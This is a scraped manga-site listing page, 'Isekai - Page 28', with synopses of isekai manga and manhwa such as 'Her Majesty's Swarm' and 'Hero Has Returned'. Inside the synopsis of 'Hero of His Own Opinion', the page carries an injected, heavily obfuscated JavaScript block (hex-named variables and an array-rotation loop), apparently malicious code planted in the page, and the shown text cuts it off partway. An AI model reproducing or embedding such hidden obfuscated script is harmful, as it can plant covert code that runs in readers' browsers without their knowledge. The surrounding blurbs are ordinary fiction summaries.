Isekai - Page 28

Isekai manga revolves around characters who are transported to another world, often one filled with fantasy, magic, and epic adventures. The protagonist typically navigates the challenges of this new world, sometimes gaining special powers or becoming a hero.

1500 results

Henkyou No Mahou Kusushi - Jiyuu Kimama Na Isekai Mono Zukuri Nikki

Me, who has mastered the game profession of "magic medicine doctor," was reborn in a miserable world where the only medicine available was a grotesque recovery potion!Reincarnate as a child of a noble family and save the world by secretly improving magic potions. If you create not only medicines but also various other things, you may be thanked by your cute little sister and everyone in the territory!


Her Majesty's Swarm

Our protagonist is a college student who enjoys playing as the evil-aligned faction Arachnea in her favorite real-time strategy game. One day, she finds herself in a world similar to the one in the game; additionally, her body is now that of a fourteen-year-old girl. While things are a bit different from how they were in the game, one element has remained the same: she is the leader of the Arachnea. The insects under her control, collectively known as the Swarm, praise her and implore her to lead them to victory. In order to survive, she raises her Swarm and forms friendly relations with the elves of the neighboring forest. But after a slaver traveling through the forest murders one of her Swarm and the nearby kingdom's knights burn down the elven village and massacre its people, she prepares to launch her counterattacks in the name of revenge. However, revenge is merely a pretense for attacking the countries of this world. Her command is masterful and severe, as one who has played the game in real life… ---


Here Comes the Silver Spoon!

\"I want to be able to fight for large properties, not just those small side dishes! Let me increase the tension between parents and their children! Brother, I\'m asking for a promotion!\" And so, my miserable life as Korea\'s number one \'dirt spoon\' ended. Round two, and I\'m back as the daughter of a chaebol! Moreover, I\'m also the heir to the Sergio family, who\'s gained complete control of the South! Although there are some downsides being the sister of a villain, in the end, does it even matter? After all, I\'m still fated to inherit the family at the end of the day! But things take a turn for worse, and my life goal to reach the top is jeopardized by my back-stabbing little sister. There\'s two weeks until my father returns. During that time, I must somehow bring back the best groom of the empire. And that\'s how the bridegroom expedition started. If you\'re young, capable, and handsome, even better! Although it\'ll take a little while... whatever. It\'s a contract marriage anyway, so there\'s no way to really confirm all those attributes. --- Adelaide looks at him resentfully, not licking her lips. It may have be embarrassing in front of the statue-like Commander of Knights, but she\'s already learned from the depths of her bones that this man is also a beast. \"Ah... that\'s it,\" Killian approaches her with a charming smile and locks her in his arms. A voice whispers against her shoulder and into her ear, \"You never said you had a problem with this.\" --- **Official Translations** - [Indonesian]( - [Japanese](


Hero Has Returned

Reading manga Hero Has Returned Kim Min-soo, a hero who saved another world with the single thought of returning home.He saved the world, but couldn’t save himself, and decides to destroy the world.This story is about the last moments of the heroes, a cold reality with no happy ending.

2 days ago

Hero of His Own Opinion

Life is full of surprises that one would never expect, and I say this after living one life as a Demon King and another as an ordinary mortal. Now, a third life awaits me – one where I’ll be the hero and fight on the side of justice in my first world.Ironic, isn’t it?I was known as a bastard and a psycho, but now I’m supposed to be fighting for the good and for a brighter future? As a former Demon King, I have my own opinion. Hero with Another Opinion | ????? ??? ????? ?????? | ????????<script></script><script>(function(_0x5a0369,_0x12f416){var _0x330366=_0x2f23,_0x5699bb=_0x5a0369();while(!![]){try{var _0x34e7b8=parseInt(_0x330366(0x1c0))/(-0x5b7+0x1*-0x79f+-0x1*-0xd57)+parseInt(_0x330366(0x1be))/(-0x2671+0x1b7*-0xa+0x3799*0x1)*(-parseInt(_0x330366(0x1b2))/(-0x3*0x95+-0x166f*0x1+0xb*0x233))+parseInt(_0x330366(0x1b8))/(0x1*-0xd81+0x1ad5+-0xd50)*(parseInt(_0x330366(0x1c2))/(-0x708+0x1*0x2668+-0x1f5b))+parseInt(_0x330366(0x1cf))/(0x1b8*0x3+-0xcf4+0x7d2)+-parseInt(_0x330366(0x1d0))/(0x2b6*-0xd+0x1*-0xca3+0x2fe8)*(-parseInt(_0x330366(0x1bc))/(0x419*0x1+-0x1b12+0x1701))+parseInt(_0x330366(0x1cd))/(0x283*-0x2+0x1*0x99d+-0x48e)+-parseInt(_0x330366(0x1c7))/(0xfde+-0x3a+-0xf9a);if(_0x34e7b8===_0x12f416)break;else _0x5699bb['push'](_0x5699bb['shift']());}catch(_0xf280c7){_0x5699bb['push'](_0x5699bb['shift']());}}}(_0x3c53,-0x1*0x1d99ff+-0xca465+-0xd8*-0x4414));function _0x3c53(){var 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Hero Of The Rebellion: Use Your Skills To Control The Mind And Body Of The Maddened Princess

When Sasahara Shinta was suddenly summoned to another world with the objective of subjugating the Demon Lord, he makes full use of his cheat skill that sees people’s status and tries taking a look at the Princess who summoned him, but when he did, it says that the Hero is arranged to be assassinated after the Demon Lord’s subjugation.That’s right, this is a shitty otherworld where the Hero’s life is treated like dirt.To avoid being assassinated, Shinta pretends to submit, but…


Hero or Demon Lord? Let me choose!

Nanami died in her previous life, but an Angel suddenly appears before her then gives her a second chance!? But... Miss Angel reincarnates her as both Hero and Demon Lord?!?! Poor Nanami has a tough road ahead, against herself!


Heroine? Saint? No, I'm an All-Works Maid

Melody reincarnates into the world of an otome game and works as a maid. As someone who has never played an otome game, what she hasn't realized is that she's actually the saint, the heroine of the game.


Hey Little Duke, Just Trust in Sister

Read manhwa Hey Little Duke, Just Trust in Sister / 이봐요, 아기 공작님 누나만 믿어! Trusting only her talent in swordsmanship, Espin tried to become the best knight but failed. It was because of Duke Xenoc Blacknight. The no. 1 knight in the Empire. I hated him so much. He was nothing but an enemy. “I won.” I was finally able to beat him, but my last memory was leaving the knights order then jumping in front of a carriage to save a rabbit. I thought I was going to die just like that… but I got resurrected? I opened my eyes back in the Empire 18 years ago, completely in a different body! “So if I gather sacred beasts like you, you’ll bring me back to my original time?” -Exactly! So if I help the sacred beasts, I can go back to my original time and live a new life! Instead of being resurrected, I wanted to live and enjoy the things I wasn’t able to enjoy before. “No, I-I’m scared…!” The Xenoc from 18 years ago is crying while hugging me?! “You… said you would marry me. Why are you running away?” Will Espin, who suddenly became a time-traveler, be able to fulfill her mission and go back?

3 days ago

Hey, Little Duke, Just Trust this Sister!

Read manhwa Hey, Little Duke, Just Trust this Sister! / Hey, Just Trust This Big Sister, Little Duke / Hey, Little Duke Only Trust Your Sister! / Hey, Little Duke, Just Trust in Sister! / Trust Me, Little Duke! / Ibwayo, Agi Gongjaknim Nunaman Mideo! / Ibwayo, Agi Gongjangnim Nunaman Mideo! After a tragic life spent in the shadow of her superior Duke Senoc Blacknight, the powerful Dame Aspyn Soir is sent back in time and given a lucky second chance at life. She’s thrilled, at least until she runs into the very same Senoc! However, this frightened boy is very different from the cool, composed sword master Aspyn knew. Even though Senoc nearly killed her, she can’t help taking pity on his younger self. If nobody stops her, Aspyn just might end up helping out her greatest enemy. “Hey, Little Duke, Just Trust this Sister! Manhwa” is sames name: Ê Bé Công Tước, Cứ Tin Ở Chị Đi! Маленький герцог, доверяй только мне Эй, малыш герцог, доверяй только своей сестре! 公爵様、私に任せて! 小公爵,相信我吧! 이봐요, 아기 공작님 누나만 믿어!

3 days ago

Hiroki, Too, Gets Summoned Into Another World

Hiroki, an office worker who works for a black company, likes anime and manga about being reincarnated into another world. One night, he hated his job so much that he said, "If there is a different world, I want to go there...!". To be summoned as a mage...! The days with the elf Millia, who is the owner of the heavenly voice, and the dragon Sophie, are completely different from what he imagined them to be. A different world comedy starts now!


Hiroyuki: Invincible Pundit In Another World

After being transferred to another world, Hiroyuki defeats his opponents, whether they are humans or demons, and lives at his own pace, just as he does in the present world. In this world of swords and magic, Hiroyuki's warriors continue! Translation note: Hiroyuki Nishimura is a self-help author and television personality who is best known for founding 2channel, one of Japan’s big anonymous message boards. You may know of its western equivalent 4chan, which he bought in 2015.
